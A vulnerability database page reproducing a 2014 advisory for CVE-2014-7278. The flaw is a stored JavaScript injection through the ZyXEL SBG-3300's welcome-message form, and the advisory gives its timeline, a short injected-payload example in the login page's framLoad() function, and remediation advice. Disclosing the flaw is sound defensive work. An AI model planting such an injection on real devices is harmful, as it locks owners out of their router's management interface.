| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| ZyXEL SBG-3300 Security Gateway Denial Of Service Vulnerability | 5 Oct 201400:00 | – | zdt | |
| CVE-2014-7278 | 4 Oct 201410:00 | – | cve | |
| CVE-2014-7278 | 4 Oct 201410:00 | – | cvelist | |
| EUVD-2014-7149 | 7 Oct 202500:30 | – | euvd | |
| CVE-2014-7278 | 4 Oct 201410:55 | – | nvd | |
| Cross site scripting | 4 Oct 201410:55 | – | prion | |
| Design/Logic Flaw | 4 Oct 201410:55 | – | prion | |
| CVE-2014-7278 DoS in ZyXEL SBG-3300 Security Gateway | 5 Oct 201400:00 | – | securityvulns | |
| ZyXEL SBG-3300 security vulnerabilities | 5 Oct 201400:00 | – | securityvulns |
`########################################
#Vulnerability Title: DoS in ZyXEL SBG-3300 Security Gateway
#Date: 02/10/2014
#CVE-ID: CVE-2014-7278
#Product: ZyXEL SBG3300-N series
#Vendor: www.zyxel.com
#Affected Firmware: Latest version at the time of disclosure V1.00(AADY.4)C0 and below (tested)
#Patch: Unpatched
#Authored by: Mirko Casadei
########################################
#Disclosure Timeline:
13/08/2014 Vendor Contact with Acknowledgment
13/09/2014 No response from Vendor after first contact
02/10/2014 Full Disclosure
#Technical details:
Abusing the 'welcome message' form, an attacker can inject JavaScript code into a core function of the main login page.
The persistent javascript code injection in the framLoad() function bypass all the security checks and cause a Denial of Service disabling any access to the router web interface.
Access is restored with a new firmware installation.
Example of a working code:
//////// !WARNING! TEST AT YOUR OWN RISK ///////
var loginMsg loads input from the 'welcome message form'
...
function framLoad () {
var status = '0';
var count = '';
var Retry = '';
var period = '';
var loginMsg = '<DoS="javascript:alert('DoS coming!')">';
var LockTime;
var waitTime;
if ( advancedaccountsecurity == '0' ) {
loginrandom = '0';
}
...
#Remediation
The vulnerable form should sanitize input.
########################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation